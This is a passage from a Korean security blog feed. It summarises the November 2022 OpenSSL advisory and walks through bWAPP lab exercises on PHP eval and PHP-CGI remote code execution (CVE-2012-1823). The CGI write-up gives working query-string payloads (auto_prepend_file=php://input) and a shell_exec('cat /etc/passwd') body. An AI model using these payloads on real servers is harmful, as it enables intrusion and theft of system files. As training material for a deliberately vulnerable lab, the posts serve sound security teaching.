&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;2022년&amp;nbsp;11월&amp;nbsp;1일&amp;nbsp;OpenSSL&amp;nbsp;프로젝트는&amp;nbsp;심각도가&amp;nbsp;높은&amp;nbsp;것으로&amp;nbsp;간주되는&amp;nbsp;취약점을&amp;nbsp;자세히&amp;nbsp;설명하는&amp;nbsp;보안&amp;nbsp;게시판&amp;nbsp;을&amp;nbsp;발표했습니다&amp;nbsp;.&amp;nbsp;취약점은&amp;nbsp;취약한&amp;nbsp;클라이언트&amp;nbsp;또는&amp;nbsp;서버가&amp;nbsp;X.509&amp;nbsp;인증서의&amp;nbsp;유효성을&amp;nbsp;검사할&amp;nbsp;때&amp;nbsp;트리거될&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;메모리&amp;nbsp;손상&amp;nbsp;버그입니다.&amp;nbsp;클라이언트&amp;nbsp;또는&amp;nbsp;서버&amp;nbsp;인증서의&amp;nbsp;비ASCII&amp;nbsp;코드포인트를&amp;nbsp;악용하는&amp;nbsp;특수하게&amp;nbsp;조작된&amp;nbsp;이메일&amp;nbsp;주소는&amp;nbsp;이&amp;nbsp;취약점을&amp;nbsp;악용하여&amp;nbsp;서비스&amp;nbsp;거부(DoS)&amp;nbsp;또는&amp;nbsp;원격&amp;nbsp;코드&amp;nbsp;실행(RCE)을&amp;nbsp;달성할&amp;nbsp;수&amp;nbsp;있습니다. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;공격자는&amp;nbsp;취약한&amp;nbsp;응용&amp;nbsp;프로그램이&amp;nbsp;신뢰할&amp;nbsp;수&amp;nbsp;없는&amp;nbsp;X.509&amp;nbsp;인증서(TLS&amp;nbsp;인증서&amp;nbsp;포함)를&amp;nbsp;확인하는&amp;nbsp;모든&amp;nbsp;상황에서&amp;nbsp;취약점을&amp;nbsp;악용할&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;특히&amp;nbsp;다음이&amp;nbsp;포함될&amp;nbsp;수&amp;nbsp;있습니다. &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;취약한&amp;nbsp;클라이언트에&amp;nbsp;특수하게&amp;nbsp;조작된&amp;nbsp;TLS&amp;nbsp;서버&amp;nbsp;인증서를&amp;nbsp;보내는&amp;nbsp;악성&amp;nbsp;서버 &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;클라이언트&amp;nbsp;측&amp;nbsp;TLS&amp;nbsp;인증이&amp;nbsp;필요한&amp;nbsp;취약한&amp;nbsp;서버에&amp;nbsp;특수하게&amp;nbsp;조작된&amp;nbsp;클라이언트&amp;nbsp;측&amp;nbsp;TLS를&amp;nbsp;보내는&amp;nbsp;악성&amp;nbsp;클라이언트 &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333;&quot;&gt;Datadog&amp;nbsp;Security&amp;nbsp;Labs&amp;nbsp;팀은&amp;nbsp;Windows에서&amp;nbsp;취약한&amp;nbsp;시나리오를&amp;nbsp;복제하고&amp;nbsp;Windows에서&amp;nbsp;OpenSSL을&amp;nbsp;충돌시키는&amp;nbsp;PoC를&amp;nbsp;제작했습니다.&amp;nbsp;우리는&amp;nbsp;Linux에서&amp;nbsp;동일한&amp;nbsp;환경을&amp;nbsp;복제했으며,&amp;nbsp;여러&amp;nbsp;낮은&amp;nbsp;수준의&amp;nbsp;기술&amp;nbsp;세부&amp;nbsp;정보&amp;nbsp;로&amp;nbsp;인해&amp;nbsp;취약점을&amp;nbsp;악용할&amp;nbsp;수&amp;nbsp;없다고&amp;nbsp;중간&amp;nbsp;수준의&amp;nbsp;확신을&amp;nbsp;갖고&amp;nbsp;있습니다&amp;nbsp;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;[참고사이트]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://www.openssl.org/news/secadv/20221101.txt&quot;&gt;https://www.openssl.org/news/secadv/20221101.txt&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://www.openssl.org/source/&quot;&gt;https://www.openssl.org/source/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66999&quot;&gt;https://krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66999&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;a style=&quot;color: #006dd7;&quot; href=&quot;https://securitylabs.datadoghq.com/articles/openssl-november-1-vulnerabilities/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://securitylabs.datadoghq.com/articles/openssl-november-1-vulnerabilities/&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>Code::보안공지</category>
      <category>CVE-2022-3602</category>
      <category>CVE-2022-3786</category>
      <category>KISA 보안권고</category>
      <category>OpenSSL</category>
      <category>openssl 취약점</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/255</guid>
      <comments>https://securitycode.tistory.com/255#entry255comment</comments>
      <pubDate>Wed, 2 Nov 2022 11:05:41 +0900</pubDate>
    </item>
    <item>
      <title>비박스(bWAPP) A9 PHP Eval Function</title>
      <link>https://securitycode.tistory.com/254</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;이&amp;nbsp;도구를&amp;nbsp;이용하여&amp;nbsp;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;A9&amp;nbsp;-&amp;nbsp;PHP&amp;nbsp;Eval&amp;nbsp;Function&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;- eval 함수는 인수 문자열을 PHP 코드로 실행할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;- 문자열은&amp;nbsp;유효한&amp;nbsp;PHP&amp;nbsp;코드여야&amp;nbsp;하며&amp;nbsp;세미콜론으로&amp;nbsp;끝나야&amp;nbsp;합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;- shell_exec - 셸을 통해 명령을 실행하고 전체 출력을 문자열로 반환&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;455&quot; data-origin-height=&quot;138&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/chgRDI/btrP3Axed9O/KzzkFDETiYxh0z8ujAWaKk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/chgRDI/btrP3Axed9O/KzzkFDETiYxh0z8ujAWaKk/img.png&quot; data-alt=&quot;php_eval.php&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/chgRDI/btrP3Axed9O/KzzkFDETiYxh0z8ujAWaKk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FchgRDI%2FbtrP3Axed9O%2FKzzkFDETiYxh0z8ujAWaKk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;167&quot; data-origin-width=&quot;455&quot; data-origin-height=&quot;138&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;php_eval.php&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;php_eval.php 페이지를 살펴 보면 이 위험한 PHP 기능을 이용하려면 소스 코드를 확인하십시오.라는 메시지를 확인할 수 있습니다. 그럼 소스코드를 확인해 보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;887&quot; data-origin-height=&quot;549&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/v3Ev1/btrPZal0A4T/OpmTzkN87XmJeMMDQVG1Gk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/v3Ev1/btrPZal0A4T/OpmTzkN87XmJeMMDQVG1Gk/img.png&quot; data-alt=&quot;php_eval.php 소스코드&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/v3Ev1/btrPZal0A4T/OpmTzkN87XmJeMMDQVG1Gk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fv3Ev1%2FbtrPZal0A4T%2FOpmTzkN87XmJeMMDQVG1Gk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;464&quot; data-origin-width=&quot;887&quot; data-origin-height=&quot;549&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;php_eval.php 소스코드&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;소스코드를 확인해 보면 eval 함수가 사용가능하다는 것을 알 수 있으며, eval 함수에 전달된 값이 서버에 전달되고 그 내용이 출력이 된다는 것을 알 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;983&quot; data-origin-height=&quot;714&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bMoEE7/btrP2pXhx1M/kgLfgJukLImuDpwT5ij6Nk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bMoEE7/btrP2pXhx1M/kgLfgJukLImuDpwT5ij6Nk/img.png&quot; data-alt=&quot;eval 함수를 통한 php 정보 출력&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bMoEE7/btrP2pXhx1M/kgLfgJukLImuDpwT5ij6Nk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbMoEE7%2FbtrP2pXhx1M%2FkgLfgJukLImuDpwT5ij6Nk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;545&quot; data-origin-width=&quot;983&quot; data-origin-height=&quot;714&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;eval 함수를 통한 php 정보 출력&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;eval 함수를 통하여 phpinfo 정보를 출력하면 현재 설정된 php의 버전과 내용이 그대로 출력이 되는것을 확인할 수 있습니다. 추가로 shell_exec() 함수를 통하여 Command 명령도 가능하니 확인해 보시기를 추천드립니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 취약점을 조치하기 위해서는 소스코드 수정이 필요합니다.&lt;/p&gt;</description>
      <category>bWAPP</category>
      <category>PHP Eval Function</category>
      <category>비박스</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/254</guid>
      <comments>https://securitycode.tistory.com/254#entry254comment</comments>
      <pubDate>Mon, 31 Oct 2022 17:13:47 +0900</pubDate>
    </item>
    <item>
      <title>비박스(bWAPP) A9 PHP CGI Remote Code Execution</title>
      <link>https://securitycode.tistory.com/253</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;이&amp;nbsp;도구를&amp;nbsp;이용하여&amp;nbsp;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&amp;nbsp;&lt;/span&gt;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;A9&amp;nbsp;-&amp;nbsp;PHP&amp;nbsp;CGI&amp;nbsp;Remote&amp;nbsp;Code&amp;nbsp;Execution&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;공용 게이트웨이 인터페이스(Common Gateway Interface; CGI)&lt;/b&gt;는 웹 서버 상에서 사용자 프로그램을 동작시키기 위한 조합입니다. 존재하는 많은 웹 서버 프로그램은 CGI의 기능을 이용할 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;696&quot; data-origin-height=&quot;166&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mMDnQ/btrPXs0C3M4/zx5WrtVPSIRQZiN8WQsJd1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mMDnQ/btrPXs0C3M4/zx5WrtVPSIRQZiN8WQsJd1/img.png&quot; data-alt=&quot;php_cgi.php&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mMDnQ/btrPXs0C3M4/zx5WrtVPSIRQZiN8WQsJd1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmMDnQ%2FbtrPXs0C3M4%2Fzx5WrtVPSIRQZiN8WQsJd1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;179&quot; data-origin-width=&quot;696&quot; data-origin-height=&quot;166&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;php_cgi.php&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;php_cgi.php 페이지를 살펴 보면 PHP 원격명령 실행 취약점이라는 것을 알 수 있습니다. HINT 부분에 exploit를 눌러 확인해 보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1214&quot; data-origin-height=&quot;163&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/5GshX/btrPVEAhUut/Wv6L8pIURINri2gbuEYEA0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/5GshX/btrPVEAhUut/Wv6L8pIURINri2gbuEYEA0/img.png&quot; data-alt=&quot;exploit&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/5GshX/btrPVEAhUut/Wv6L8pIURINri2gbuEYEA0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F5GshX%2FbtrPVEAhUut%2FWv6L8pIURINri2gbuEYEA0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;101&quot; data-origin-width=&quot;1214&quot; data-origin-height=&quot;163&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;exploit&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;CVE-2012-1823 취약점은 2012년 1월에 발견된 취약점으로 PHP의 특정 버전의 sapi/cgi/cgi_main.c에서 CGI 스크립트가 질의 문자열을 제대로 처리하지 못하여 발생하는 취약점으로, 명령어 라인 옵션을 질의 문자열에 포함하여 원격 명령을 실행할 수 있는 취약점입니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;설명&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;PHP 5.3.12 이전 및 5.4.x 이전 5.4.2에서 sapi/cgi/cgi_main.c는 CGI 스크립트(php-cgi라고도 함)로 구성된 경우 =(&lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;equals sign&lt;/span&gt;) 문자가 없는 쿼리 문자열을 제대로 처리하지 않습니다. 이는 원격 공격자가 쿼리 문자열에 명령줄 옵션을 배치하여 임의의 코드를 실행할 수 있도록 하며, 이는 'd' 경우에 특정 php_getopt를 건너뛰지 않는 것과 관련이 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;934&quot; data-origin-height=&quot;190&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/38tCe/btrP3jPhrMM/ietxQ5pwVYaxJEDurAkESk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/38tCe/btrP3jPhrMM/ietxQ5pwVYaxJEDurAkESk/img.png&quot; data-alt=&quot;php 버전 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/38tCe/btrP3jPhrMM/ietxQ5pwVYaxJEDurAkESk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F38tCe%2FbtrP3jPhrMM%2FietxQ5pwVYaxJEDurAkESk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;153&quot; data-origin-width=&quot;934&quot; data-origin-height=&quot;190&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;php 버전 확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;php-cgi -v 를 통해서도 확인이 가능 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 취약점은 특정 버전에서 발생하는 취약점으로 php_cgi.php 페이지에서 admin을 누른후 phpinfo.php 페이지에서 자신의 php 버전을 확인하시기 바랍니다. 저는 현재 5.6.0 버전으로 여기서는 취약점 확인 방법을 알아보고 추후에 버전을 낮춰서 다시 한번 확인해 보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;622&quot; data-origin-height=&quot;349&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/GoOyz/btrPS0Yh2z1/GuAgWoyV03cmcmAa94Jpdk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/GoOyz/btrPS0Yh2z1/GuAgWoyV03cmcmAa94Jpdk/img.png&quot; data-alt=&quot;php cgi 명령어 옵션&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/GoOyz/btrPS0Yh2z1/GuAgWoyV03cmcmAa94Jpdk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FGoOyz%2FbtrPS0Yh2z1%2FGuAgWoyV03cmcmAa94Jpdk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;421&quot; data-origin-width=&quot;622&quot; data-origin-height=&quot;349&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;php cgi 명령어 옵션&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;PHP CGI 취약점을 이용한 원격코드는 주로 3개의 옵션을 사용합니다. 나머지 옵션들에 대해서는 참고에 features.commandline.options.php 페이지를 참고하여 확인하시기 바랍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;-n php.ini 파일을 사용하지 않음&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;-s 소스 코드에 색을 입혀 보여줌&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;-d php.ini에 정의도니 설정 내용을 임의로 설정&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;http://localhost/bWAPP/admin/?-s 취약점 존재 시 소스코드가 노출&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;-d 옵션을 이용하여 설정 파일을 직접 변경하고 php 코드 실행이 가능, 현재 설정된 내용은 php.ini 파일에서 확인이 가능합니다. 다른 자세한 옵션은 참고를 확인해 주시기 바랍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;allow_url_fopen=1 : 외부의 URL로부터 파일을 호출&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;allow_url_include=1 : 외부의 파일을 include, include_once, require, require_once와 같은 파일로 include 허용&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;auto_prepend_file=php://input : HTTP Request Body로 데이터를 가져와 실행&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;파일 내용 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;http://localhost/bWAPP/admin/?-d+auto_prepend_file%3d[파일명]+-n&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;버프 스위트 사용&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;http://localhost/bWAPP/admin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;lt;?php $output = shell_exec('cat /etc/passwd'); echo &quot;$output&quot;; die; #output은 cat /etc/passwd 파일을 가져오겠다는 뜻입니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;참고&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://www.php.net/manual/en/features.commandline.options.php&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.php.net/manual/en/features.commandline.options.php&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include&lt;/a&gt;&lt;/p&gt;</description>
      <category>Code::Security/비박스(BWAPP)</category>
      <category>bWAPP</category>
      <category>CVE-2012-1823</category>
      <category>PHP CGI Remote Code Execution</category>
      <category>php-cgi</category>
      <category>비박스</category>
      <category>원격명령실행</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/253</guid>
      <comments>https://securitycode.tistory.com/253#entry253comment</comments>
      <pubDate>Mon, 31 Oct 2022 14:53:27 +0900</pubDate>
    </item>
    <item>
      <title>비박스(bWAPP) A9 Heartbleed Vulnerability</title>
      <link>https://securitycode.tistory.com/251</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;이&amp;nbsp;도구를&amp;nbsp;이용하여&amp;nbsp;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다. &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;A9&amp;nbsp;-&amp;nbsp;Heartbleed&amp;nbsp;Vulnerability&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
